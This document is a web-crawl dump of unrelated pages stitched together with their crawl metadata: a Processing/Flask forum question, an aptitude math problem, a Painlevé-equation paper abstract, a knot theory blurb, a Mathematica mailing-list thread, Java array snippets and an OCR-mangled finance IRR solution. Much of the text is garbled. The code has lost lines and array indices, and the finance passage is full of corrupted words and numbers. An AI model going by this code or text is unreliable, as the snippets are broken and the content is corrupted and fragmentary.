msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:31b19401-c40d-4ebb-9bf7-ae3330e2afa0>\",\"WARC-Concurrent-To\":\"<urn:uuid:23405b28-924b-4223-857f-7ba6558a5eeb>\",\"WARC-IP-Address\":\"82.180.175.187\",\"WARC-Target-URI\":\"https://newshuntexpress.com/saudi-german-foreign-ministers-hold-talks-in-jeddah/\",\"WARC-Payload-Digest\":\"sha1:ANZYOSNGWYRM42CSUFGCINDPLY4PK2O2\",\"WARC-Block-Digest\":\"sha1:RMGPV3SMYKAKSFVAZB4NTMLAQWTWPARC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511364.23_warc_CC-MAIN-20231004084230-20231004114230-00449.warc.gz\"}"}
https://discourse.processing.org/t/loading-json-array-in-flask/41858
[ "Hi! I’m working on a website using Python and Flask. One of the pages needs to render a processing sketch, with the fill() parameter based on data in a list that is created in the Flask project file app.py. Basically, in the page route, I create a colormap and then extract the RGB of the colors in that colormap and put it in a list. I then convert that list into a JSON array and save it in a JSON file. The route returns a render_template of an html file which renders the processing file. In the processing file, I want to loop through the list of colours with each loop resulting in the fill() being a different colour in the list. I tried to “send” this variable using template variables in the html file, but no matter what I do it doesn’t work. So I landed on this attempt which is saving the object to JSON and importing it to processing. Although I can’t figure out how to do this. The loadJSON method seems to be incompatible for websites as its not in Javascript. Keep in mind that the list is not static, hence why I’m not just hardcoding it. The colormap parameters will change based on changes in other data in my python script.\n\nHere’s what I have.\n\nHere is the route in app.py:\n\n``````@app.route('/processor')\ndef processor():\npalette = Cubehelix.make(start=0.3, rotation=-0.5, n=10)\nparticleArray = palette.colors\nwith open(\"particleArray.json\", 'w') as f:\njson.dump(particleArray, f)\nwith open(\"particleArray.json\") as f:\nreturn render_template('a.html')\n``````\n\nThis is a.html that is being rendered by the above route:\n\n``````<!DOCTYPE html>\n<html lang=\"en\">\n<meta charset=\"UTF-8\">\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n<title>My Processing Sketch</title>\n<script src=\"https://cdn.jsdelivr.net/processing.js/1.4.8/processing.min.js\"></script>\n</script>\n<body>\n<canvas data-processing-sources=\"{{url_for('static', filename= 'myProgram.pde')}}\"></canvas>\n</body>\n</html>\n``````\n\nHere is myProgram.pde where my Processing sketch is stored:\n\n``````JSONObject json;\n\nint dim;\n\nvoid setup() {\nsize(800, 800);\ndim = width/2;\nbackground(0);\nnoStroke();\n}\n\nvoid draw() {\nbackground(0);\nfor (int x = 0; x <= width; x+=dim) {\nfilter(BLUR,4);\n}\n}\n\nvoid drawGradient(float x, float y) {\nfloat a= 0;\nint h= 0;\nint len= values.size();\nfor (int r = radius; r > 0; --r) {\nint[] help= values.getInt(h);\nfill(help,help,help);\nellipse(x, y, r+30, r);\na+=10;\nh++;\nif (h >= len) {\nh=0;\n}\n}\n}\n``````\n\nThis together renders the Processing canvas but it’s just black. Nothing is being drawn. I thought maybe I should try to write it in p5.js way because perhaps the loadJSONArray is not a thing for Javascript and wrote this version of the Processing sketch as tester.pde (and changed the html file to point to this file). This just renders a blank page. No canvas, nothing.\n\n``````let particleArray;\n\n}\n\nfunction setup() {\ncreateCanvas(800, 800);\nbackground(0);\nnoStroke();\n}\n\nfunction draw() {\nbackground(0);\nfor (let x = 0; x <= width; x += dim) {\nfilter(BLUR, 4);\n}\n}\n\nlet radius = dim * 2;\nlet a = 0;\nlet h = 0;\nlet len = particleArray.length;\nlet angle = radians(30 + a);\nfor (let r = radius; r > 0; --r) {" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6936727,"math_prob":0.6178733,"size":3807,"snap":"2023-14-2023-23","text_gpt3_token_len":1018,"char_repetition_ratio":0.10018407,"word_repetition_ratio":0.031088082,"special_character_ratio":0.29655898,"punctuation_ratio":0.18181819,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97667664,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-05-28T06:26:27Z\",\"WARC-Record-ID\":\"<urn:uuid:4167de77-bdac-4333-bd3b-fa8a01708635>\",\"Content-Length\":\"21009\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1d72abcb-792f-4cc5-a565-453fdf0b00df>\",\"WARC-Concurrent-To\":\"<urn:uuid:12756851-03ad-4d21-9ff8-032306648441>\",\"WARC-IP-Address\":\"74.82.16.203\",\"WARC-Target-URI\":\"https://discourse.processing.org/t/loading-json-array-in-flask/41858\",\"WARC-Payload-Digest\":\"sha1:KT4DEWGL4HM74E7S32LEPWSIIYJJE2J2\",\"WARC-Block-Digest\":\"sha1:JXPPSLSONMD7FHEEH6QMYRXCKJZEORXI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224643585.23_warc_CC-MAIN-20230528051321-20230528081321-00758.warc.gz\"}"}
https://www.wikitechy.com/interview-questions/aptitude/numbers/the-total-number-of-two-digit-positive-integer-lesser-than-100
[ "# The total number of two-digit positive integer lesser than 100, which are not divisible by 2, 3 and 5 is ?\n\nThe total number of two-digit positive integer lesser than 100, which are not divisible by 2, 3 and 5 is ?\n\nA. 23\n\nB. 24\n\nC. 25\n\nD. 26\n\n## Explanation:\n\nNumbers less than 100 divisible by 2 are 10, 12, 14, 16,...,98.\nTotal numbers divisible by 2 are 45\nRemaining numbers are 11, 13, 15, 17, 19...99 = 45\n\nNumbers divisible by 3 in the above numbers are 15, 21, 27, 33, 39, 45, 51, 57, 63, 69, 75, 81, 87, 93 and 99.\nTotal numbers divisible by 3 are = 15\nRemaining integers = 45-15 = 30.\n\nNumbers divisible by 5 in the remaining numbers = 25, 35, 55, 65, 85, 95\nTotal numbers = 6\nRemaining 30-6 = 24.\n\nSo 24 numbers are not divisible by 2, 3 and 5." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.917882,"math_prob":0.9996685,"size":757,"snap":"2019-51-2020-05","text_gpt3_token_len":280,"char_repetition_ratio":0.20982736,"word_repetition_ratio":0.24183007,"special_character_ratio":0.44385734,"punctuation_ratio":0.25365853,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9996617,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-13T07:50:30Z\",\"WARC-Record-ID\":\"<urn:uuid:78241206-7fe0-4e3c-904c-96a8465fbd50>\",\"Content-Length\":\"40665\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:977d5078-09b9-400d-bbaa-8b1e08f429f8>\",\"WARC-Concurrent-To\":\"<urn:uuid:f1db95a9-edc5-4660-9f38-71f546c209a6>\",\"WARC-IP-Address\":\"162.144.36.172\",\"WARC-Target-URI\":\"https://www.wikitechy.com/interview-questions/aptitude/numbers/the-total-number-of-two-digit-positive-integer-lesser-than-100\",\"WARC-Payload-Digest\":\"sha1:A3CEABTK4ZDJVVTP6QFT4YXSOUNGD6PN\",\"WARC-Block-Digest\":\"sha1:SCEWWGVBY65PAK6BKD4NL5U7DOBGWAS6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540551267.14_warc_CC-MAIN-20191213071155-20191213095155-00209.warc.gz\"}"}
https://researchnow.flinders.edu.au/en/publications/exact-solutions-of-a-q-discrete-second-painlev%C3%A9-equation-from-its-2
[ "# Exact solutions of a q-discrete second Painlevé equation from its iso-monodromy deformation problem. II. Hypergeometric solutions: {II}. {H}ypergeometric solutions\n\nNalini Joshi, Yang Shi\n\nResearch output: Contribution to journalArticle\n\n7 Citations (Scopus)\n\n## Abstract\n\nThis is the second part of our study of the solutions of a q -discrete second Painlevé equation (q-PII)of type (A2 + A1)(1) via its iso-monodromy deformation problem. In part I, we showed how to use the q-discrete linear problem associated with q-P II to find an infinite sequence of exact rational solutions. In this paper, we study the case giving rise to an infinite sequence of q-hypergeometric-type solutions. We find a new determinantal representation of all such solutions and solve the iso-monodromy deformation problem in closed form.\n\nOriginal language English 3247-3264 18 PROCEEDINGS OF THE ROYAL SOCIETY OF LONDON SERIES A-MATHEMATICAL PHYSICAL AND ENGINEERING SCIENCES 468 2146 https://doi.org/10.1098/rspa.2012.0224 Published - 8 Oct 2012 Yes\n\n## Keywords\n\n• discrete Painlevé equation\n• iso-mondromy deformation\n• special solutions\n• Discrete Painlevé equation\n• Iso-monodromy deformation\n• Special solutions" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7375851,"math_prob":0.40806955,"size":2041,"snap":"2020-45-2020-50","text_gpt3_token_len":599,"char_repetition_ratio":0.1281296,"word_repetition_ratio":0.6188925,"special_character_ratio":0.266536,"punctuation_ratio":0.0855615,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9880911,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-29T20:56:46Z\",\"WARC-Record-ID\":\"<urn:uuid:6cb4adc9-2df0-44a7-9c5e-cebcfa3803e7>\",\"Content-Length\":\"42289\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:13f82be5-e28e-4ee6-a20b-6c32d0401af2>\",\"WARC-Concurrent-To\":\"<urn:uuid:f6ee2401-cf4d-4bca-83b3-4eebec731d27>\",\"WARC-IP-Address\":\"18.139.148.124\",\"WARC-Target-URI\":\"https://researchnow.flinders.edu.au/en/publications/exact-solutions-of-a-q-discrete-second-painlev%C3%A9-equation-from-its-2\",\"WARC-Payload-Digest\":\"sha1:5TMVTKIU3ELM3DNUVBLQQN2ZGWWJKH2L\",\"WARC-Block-Digest\":\"sha1:VERM7O4CBVJWVGR2LMPBPTVRR55YQJB5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107905777.48_warc_CC-MAIN-20201029184716-20201029214716-00274.warc.gz\"}"}
https://learnawesome.org/topics/00a0255c-fe5e-4924-bf55-e4ded267f6e3
[ "## Knot Theory\n\nThis is a topic under mathematics.\n\nIn topology, knot theory is the study of mathematical knots. While inspired by knots which appear in daily life, such as those in shoelaces and rope, a mathematical knot differs in that the ends are joined together so that it cannot be undone, the simplest knot being a ring. In mathematical language, a knot is an embedding of a circle in 3-dimensional Euclidean space, . Two mathematical knots are equivalent if one can be transformed into the other via a deformation of upon itself ; these transformations correspond to manipulations of a knotted string that do not involve cutting the string or passing the string through itself." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9244447,"math_prob":0.929938,"size":680,"snap":"2022-27-2022-33","text_gpt3_token_len":134,"char_repetition_ratio":0.14497042,"word_repetition_ratio":0.0,"special_character_ratio":0.1882353,"punctuation_ratio":0.0952381,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97229517,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-01T10:27:06Z\",\"WARC-Record-ID\":\"<urn:uuid:70d31af9-c444-45c8-b246-fdbcbed7f54f>\",\"Content-Length\":\"31265\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8c44db3d-23d2-4046-a668-4b8398e0fe32>\",\"WARC-Concurrent-To\":\"<urn:uuid:1730f733-1aff-45ce-8720-4daa5483aa06>\",\"WARC-IP-Address\":\"78.47.128.79\",\"WARC-Target-URI\":\"https://learnawesome.org/topics/00a0255c-fe5e-4924-bf55-e4ded267f6e3\",\"WARC-Payload-Digest\":\"sha1:Z4WJNUCJZYZDRONYNVIDLLMJNSSRMIXG\",\"WARC-Block-Digest\":\"sha1:AUUN4MEGHAYQLMPDTYQI6OPF36YWDFS2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103940327.51_warc_CC-MAIN-20220701095156-20220701125156-00338.warc.gz\"}"}
http://forums.wolfram.com/mathgroup/archive/2010/Sep/msg00636.html
[ "", null, "", null, "", null, "", null, "", null, "", null, "", null, "Re: Question on Solve\n\n• To: mathgroup at smc.vnet.net\n• Subject: [mg112747] Re: Question on Solve\n• From: Andrzej Kozlowski <akoz at mimuw.edu.pl>\n• Date: Wed, 29 Sep 2010 04:13:31 -0400 (EDT)\n\n```Actually, in Mathematica 7\n\nSimplify[Solve[eqs, vars]]\nDuring evaluation of In:== Solve::svars:Equations may not give solutions for all \"solve\" variables. >>\n\n{{v1 -> I*v8, v2 -> -v8, v3 -> -v8, v4 -> (-I)*v8,\nv5 -> v8, v6 -> I*v8, v7 -> (-I)*v8}}\n\nwhich is the general answer, I believe (it includes the trivial case).\n\nSo the question still remains why:\n\nReduce[eqs, vars]\n\nv1 ==== 0 && v2 ==== 0 && v3 ==== 0 && v4 ==== 0 && v5 ==== 0 &&\nv6 ==== 0 && v7 ==== 0 && v8 ==== 0\n\nAndrzej Kozlowski\n\nOn 28 Sep 2010, at 16:21, Andrzej Kozlowski wrote:\n\n> I don't think one can fault Solve since it is not supposed to return comp=\nlete solutions anyway. I don't have anymore Mathematica 5.2 installed but M=\nathematica 7 returns a very complex output to your second example and produ=\nces a warning that it may not give solutions for all Solve variables. The o=\nutput is too complicated for me to try to check if it is correct (in some s=\nense anyway) or not.\n>\n> However, here is something that does worry me a little more:\n>\n> eqs == {(-3*Sqrt*v1 + v2 + 17*v3 + (8*I)*Sqrt*v3 -\n> 9*Sqrt*v4 + 9*v5 - Sqrt*v6 - 3*Sqrt*v7 + 9*v8)/16 ====\n> 0, (5*v1 - Sqrt*v2 + 3*Sqrt*v3 + 11*v4 + (8*I)*Sqrt*v4 -\n> 5*Sqrt*v5 + 3*v6 - 3*v7 - Sqrt*v8)/16 ====\n> 0, (-(Sqrt*v1) + 3*v2 + 3*v3 + 5*Sqrt*v4 +\n> 11*v5 + (8*I)*Sqrt*v5 - 3*Sqrt*v6 - Sqrt*v7 - 5*v8)/\n> 16 ==== 0, (-9*v1 - 3*Sqrt*v2 + Sqrt*v3 + 9*v4 +\n> 9*Sqrt*v5 + 17*v6 + (8*I)*Sqrt*v6 - v7 - 3*Sqrt*v8)/\n> 16 ==== 0, (9*v1 - Sqrt*v2 + 3*Sqrt*v3 - 9*v4 +\n> 3*Sqrt*v5 - v6 + 17*v7 + (8*I)*Sqrt*v7 - 9*Sqrt*v8)/\n> 16 ==== 0, (-5*Sqrt*v1 + 3*v2 + 3*v3 + Sqrt*v4 - 5*v5 +\n> Sqrt*v6 + 3*Sqrt*v7 + 11*v8 + (8*I)*Sqrt*v8)/16 ====\n> 0, ((11 + (8*I)*Sqrt)*v1 - 3*Sqrt*v2 + Sqrt*v3 + 5*v4 +\n> Sqrt*v5 - 3*v6 + 3*v7 + 5*Sqrt*v8)/16 ====\n> 0, (9*Sqrt*v1 + (17 + (8*I)*Sqrt)*v2 + v3 + 3*Sqrt*v4 +\n> 9*v5 + 3*Sqrt*v6 + Sqrt*v7 + 9*v8)/16 ==== 0};\n> vars == {v1, v2, v3, v4, v5, v6, v7, v8};\n>\n>\n>\n> Reduce[eqs, vars]\n>\n> v1 ==== 0 && v2 ==== 0 && v3 ==== 0 && v4 ==== 0 && v5 ==== 0 &&\n> v6 ==== 0 && v7 ==== 0 && v8 ==== 0\n>\n>\n> However, let's just add the condition that not all vi's are 0 and we get:\n>\n> Reduce[And @@ eqs && ! And @@ Thread[vars ==== 0], vars]\n>\n> v2 ==== I*v1 && v3 ==== I*v1 && v4 ==== -v1 &&\n> v5 ==== (-I)*v1 && v6 ==== v1 && v7 ==== -v1 &&\n> v8 ==== (-I)*v1 && v1 !== 0\n>\n>\n> Note that your particular solution is a special case of this one. The gen=\neral solution should be the disjunction of the trivial solution, that Reduc=\ne returned and this solutions. It seems to me that this is exactly what Red=\nuce ought to have returned. 
Of course Solve could not return this since it =\ncan't return inequalities.\n>\n> Andrzej Kozlowski\n>\n> On 28 Sep 2010, at 12:04, carlos at colorado.edu wrote:\n>\n>> I have noticed some erratic behavior of Solve,\n>> illustrated in the following two examples.\n>> Suppose I have 8 homogenous linear equations\n>>\n>> eqs=={(9*v1-3*Sqrt*v2+v3+v4-(8*I)*Sqrt*v4-\n>> 9*Sqrt*v5+9*v6-Sqrt*v7-3*Sqrt*v8)/16====0,\n>> (-(Sqrt*v1)+5*v2-Sqrt*v3+3*Sqrt*v4-5*v5-\n>> (8*I)*Sqrt*v5-5*Sqrt*v6+3*v7-3*v8)/16====0,\n>> (-5*v1-Sqrt*v2+3*v3+3*v4+5*Sqrt*v5-5*v6-\n>> (8*I)*Sqrt*v6-3*Sqrt*v7-Sqrt*v8)/16====0,\n>> (-3*Sqrt*v1-9*v2-3*Sqrt*v3+Sqrt*v4+9*v5+\n>> 9*Sqrt*v6+v7-(8*I)*Sqrt*v7-v8)/16====0,\n>> (-9*Sqrt*v1+9*v2-Sqrt*v3+3*Sqrt*v4-9*v5+\n>> 3*Sqrt*v6-v7+v8-(8*I)*Sqrt*v8)/16====0,\n>> ((-5-(8*I)*Sqrt)*v1-5*Sqrt*v2+3*v3+3*v4+\n>> Sqrt*v5-5*v6+Sqrt*v7+3*Sqrt*v8)/16====0,\n>> (5*Sqrt*v1+(-5-(8*I)*Sqrt)*v2-3*Sqrt*v3+\n>> Sqrt*v4+5*v5+Sqrt*v6-3*v7+3*v8)/16====0,\n>> (9*v1+9*Sqrt*v2+v3-(8*I)*Sqrt*v3+v4+\n>> 3*Sqrt*v5+9*v6+3*Sqrt*v7+Sqrt*v8)/16====0};\n>>\n>> The variables are\n>> v=={v1,v2,v3,v4,v5,v6,v7,v8};\n>> Then\n>> sol==Solve[eqs,v]; Print[sol];\n>>\n>> gives the parametric solution\n>> {{v4->-v3,v5->v2,v6->(-2*I)*v2-v3,\n>> v7->-3*v2+(2*I)*v3,v8->-3*v2+(2*I)*v3,v1->(2*I)*v2+v3}};\n>> which is correct.\n>>\n>> Change the above equations to\n>>\n>> eqs=={(-3*Sqrt*v1+v2+17*v3+(8*I)*Sqrt*v3-\n>> 9*Sqrt*v4+9*v5-Sqrt*v6-3*Sqrt*v7+9*v8)/16====0,\n>> (5*v1-Sqrt*v2+3*Sqrt*v3+11*v4+(8*I)*Sqrt*v4-\n>> 5*Sqrt*v5+3*v6-3*v7-Sqrt*v8)/16====0,\n>> (-(Sqrt*v1)+3*v2+3*v3+5*Sqrt*v4+11*v5+\n>> (8*I)*Sqrt*v5-3*Sqrt*v6-Sqrt*v7-5*v8)/16====0,\n>> (-9*v1-3*Sqrt*v2+Sqrt*v3+9*v4+9*Sqrt*v5+\n>> 17*v6+(8*I)*Sqrt*v6-v7-3*Sqrt*v8)/16====0,\n>> (9*v1-Sqrt*v2+3*Sqrt*v3-9*v4+3*Sqrt*v5-v6+\n>> 17*v7+(8*I)*Sqrt*v7-9*Sqrt*v8)/16====0,\n>> (-5*Sqrt*v1+3*v2+3*v3+Sqrt*v4-5*v5+Sqrt*v6+\n>> 3*Sqrt*v7+11*v8+(8*I)*Sqrt*v8)/16====0,\n>> ((11+(8*I)*Sqrt)*v1-3*Sqrt*v2+Sqrt*v3+5*v4+\n>> Sqrt*v5-3*v6+3*v7+5*Sqrt*v8)/16====0,\n>> (9*Sqrt*v1+(17+(8*I)*Sqrt)*v2+v3+3*Sqrt*v4+\n>> 9*v5+3*Sqrt*v6+Sqrt*v7+9*v8)/16====0};\n>> v=={v1,v2,v3,v4,v5,v6,v7,v8};\n>>\n>> sol==Solve[eqs,v]; Print[sol];\n>>\n>> and I get only the trivial solution\n>> {{v1->0,v2->0,v3->0,v4->0,v5->0,v6->0,v7->0,v8->0}};\n>>\n>> But the system has an infinity of nontrivial solutions,\n>> for example (this one was obtained with another method)\n>>\n>> vsol=={v1->-I,v2->1,v3->1,v4->I,v5->-1,v6->-I,v7->I,v8->-1};\n>> Print[Simplify[eqs/.vsol]];\n>> gives {True,True,True,True,True,True,True,True};\n>>\n>> These 2 examples are extracted from several thousands\n>> similar ones. Solve returns the trivial solution in\n>> about 1/3 of the instances. Mathematica version used\n>> is 5.2 under Mac OS 10.5.9.\n>>\n>> Question: what do I have to do to get the correct\n>> parametric answers in all cases?\n>>\n>\n\n```\n\n• Prev by Date: Re: Root Finding Methods Gaurenteed to Find All Root Between (xmin, xmax)\n• Next by Date: Re: Root Finding Methods Gaurenteed to Find All Root Between (xmin, xmax)\n• Previous by thread: Re: Question on Solve\n• Next by thread: Re: Question on Solve" ]
[ null, "http://forums.wolfram.com/mathgroup/images/head_mathgroup.gif", null, "http://forums.wolfram.com/mathgroup/images/head_archive.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/2.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/1.gif", null, "http://forums.wolfram.com/mathgroup/images/numbers/0.gif", null, "http://forums.wolfram.com/mathgroup/images/search_archive.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6063017,"math_prob":0.9925914,"size":5898,"snap":"2020-24-2020-29","text_gpt3_token_len":2770,"char_repetition_ratio":0.24957584,"word_repetition_ratio":0.071078435,"special_character_ratio":0.55764663,"punctuation_ratio":0.10898797,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9978216,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-28T13:24:47Z\",\"WARC-Record-ID\":\"<urn:uuid:ffe03d16-aa99-4ee1-8445-a8513e62ae4c>\",\"Content-Length\":\"49994\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:206f096e-ba96-4c08-8fc5-2d6ec9cb07fe>\",\"WARC-Concurrent-To\":\"<urn:uuid:49f93f08-a2ad-41cd-b05c-3a47cbc8a971>\",\"WARC-IP-Address\":\"140.177.205.73\",\"WARC-Target-URI\":\"http://forums.wolfram.com/mathgroup/archive/2010/Sep/msg00636.html\",\"WARC-Payload-Digest\":\"sha1:5OG4V45BVU5BV44CZGFHPT3NFSLOV5LG\",\"WARC-Block-Digest\":\"sha1:DRFEH6CN5CA7GO25MQUGXIO73D6FOMZU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347396089.30_warc_CC-MAIN-20200528104652-20200528134652-00318.warc.gz\"}"}
https://code-fetcher.com/uncategorised/two-dimensional-arrays-java-code-example
[ "# Two Dimensional Arrays Java Code Example\n\nSnippet 1\n\n``` ``` Two dimensional array:\nint[][] twoD_arr = new int;\n\nThree dimensional array:\nint[][][] threeD_arr = new int;\n``` ```\n\nSnippet 2\n\n``` ``` //Length\nint[][]arr= new int [filas][columnas];\narr.length=filas;\n\nint[][] a = {\n{1, 2, 3},\n{4, 5, 6, 9},\n{7},\n};\n\n// calculate the length of each row\nSystem.out.println(\"Length of row 1: \" + a.length);\nSystem.out.println(\"Length of row 2: \" + a.length);\nSystem.out.println(\"Length of row 3: \" + a.length);\n}``` ```\n\nSnippet 3\n\n` ` int[][] arr = new int[m][n]; ` `\n\nSnippet 4\n\n``` ``` # In python, one dimensional array look like this:\n\narray = ['plain', ' and ', 'boring!']\n\n# and I'd call an index of that one dimensiona list like this:\n\nprint(array)\n\n>> boring!\n\n# \"Okay, nice, but what is a 2D array?\" I hear you ask...\n# Well, a 2D array would look like this:\n\narray = (['wow, ', 'that is ', 'so ']\n['cool', ' it has ', 'two rows!'])\n\n# The 2D array has two rows instead of one.\n# You can call its index like this:\n\nprint(array) # is the index of the second row and is the index\n# for 'two rows!'\n\n>> two rows!\n\n# And a 3D array would look like this:\n\narray = ([1, 2, 3]\n[4, 5, 6]\n[7, 8, 9])``` ```\n\n## Similar Snippets\n\nFor Each Javascript Code Example – java\n\nWhile Loop Continue Js Code Example – java\n\nJava Creat A Folder Code Example – java\n\nJs How To Prevent A Code From Runing Code Example – java\n\nRemove Last Letter From String Java Code Example – java\n\nCreate Copy Of Array From Another Array Code Example – java\n\nFind Duplicates In Arraylist Java Code Example – java\n\nSimpledateformat Example Java Code Example – java\n\nArray Fot String Code Example – java\n\nJava Get Random Index From Array Code Example – java\n\nHow To Round A Number Javascript Code Example – java\n\nFirestore Find Doc And Set Data Code Example – java\n\nJava How To Get Files In Resources Code Example – java\n\nDifferent Types Of Writing If Else Statements Jav Code Example – java\n\nHow To Take A Image As A Background In Tkinter In Python Code Example – java\n\nCreating Java Main Method Code Example – java\n\nSwitch Case Accepts Byte In Java Code Example – java\n\nFind Duplicate And Repeating Number In Array Code Example – java" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5732572,"math_prob":0.8439144,"size":2138,"snap":"2023-40-2023-50","text_gpt3_token_len":601,"char_repetition_ratio":0.20431115,"word_repetition_ratio":0.064599484,"special_character_ratio":0.3152479,"punctuation_ratio":0.14479639,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99127585,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-02T12:09:45Z\",\"WARC-Record-ID\":\"<urn:uuid:5df19760-6ebf-41ef-a9f9-648fd11c0323>\",\"Content-Length\":\"45547\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c08263db-3662-4b6c-81f6-978cba1c9f15>\",\"WARC-Concurrent-To\":\"<urn:uuid:36039eda-dc3b-4306-a8f4-73179d7efd26>\",\"WARC-IP-Address\":\"84.32.84.247\",\"WARC-Target-URI\":\"https://code-fetcher.com/uncategorised/two-dimensional-arrays-java-code-example\",\"WARC-Payload-Digest\":\"sha1:WBAUDI2UHMO6GCFLYZQZO7BWA2GIRVIC\",\"WARC-Block-Digest\":\"sha1:EDQK5SN62XKLNR5RZE66X7BPNZC7XEN6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510994.61_warc_CC-MAIN-20231002100910-20231002130910-00308.warc.gz\"}"}
https://www.finance-assignments.com/solutions-2-4410
[ "Select Page\n\nSolution\n\n1. The sum of cash-inflows of l Hitherto machines is Rs 93,000 which when divided by the economic life of the machine (5 rears). results in a ‘fake annuity’ of Rs 18.600.\n2. Dividing the blini outlay of Rs by R, 18.600, we have ‘fake average pay hack period’ of 3.017 years.\n3. In Table A-4. the factor closest 10 3.017 for ~ rears is 2.991 for a Me of 20 per cent.\n4, Since Ihe actual cash flows in the earlier years arc greater than the average cash flows of R<‘18,600 in machine B. a subjective increase of. say, 1 per cent is made. This makes an estimated rate of IRR 21 per cent for machine II. In the case of machine A. since cash inflows in the initial rears arc smaller than the average cash flows, a subjective decrease of, say, 2 pcr cent is ‘made. This makes the estimated IRR rare 18 per cent for Michelin A. . S. Using the PV factors for 21 per cent (Mainline and II! per cent (Machine AI from Table A-3 for years 1-5, the PVs are calculated In Tank 10.1", null, "6. Since the NPV” negative for hath the machine’. the demount rate should he subsequently lowered. In the G””- of machine A the is of Rs 572 whereas in machine B the difference is Rs 107. Therefore, in the fonder case the discount rate is lowered  y 1 per cent in both the Case S. As a result, the new discount rate would be 17 per cent for A and 20 per cent for B.The calculations’given in Table 10.14 shows that the NPV at discount rate of 17 per cent is Rs 853 (machine A) and .Rs 1.049 for machine B at 20 per cent discount.", null, "(a) For machine A: Since 17 per cent and 18 per cent arc consecutive discount rates then give positive and negative net present values, interpolation method can be applied to find the actual IRR which will be between 17 and 18 per cent", null, "" ]
[ null, "http://www.finance-assignments.com/wp-content/uploads/2014/09/14-300x91.png", null, "http://www.finance-assignments.com/wp-content/uploads/2014/09/23-300x87.png", null, "http://www.finance-assignments.com/wp-content/uploads/2014/09/3-300x69.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87567717,"math_prob":0.96168125,"size":1740,"snap":"2021-31-2021-39","text_gpt3_token_len":478,"char_repetition_ratio":0.16186637,"word_repetition_ratio":0.0,"special_character_ratio":0.28965518,"punctuation_ratio":0.1191067,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98665136,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-17T22:06:02Z\",\"WARC-Record-ID\":\"<urn:uuid:a7d300bf-a6b4-413a-bc63-f622b86d4579>\",\"Content-Length\":\"131048\",\"Content-Type\":\"application/http; 